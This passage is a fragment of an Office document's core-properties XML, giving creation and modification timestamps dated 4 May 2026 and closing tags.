  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-04T20:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-04T20:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>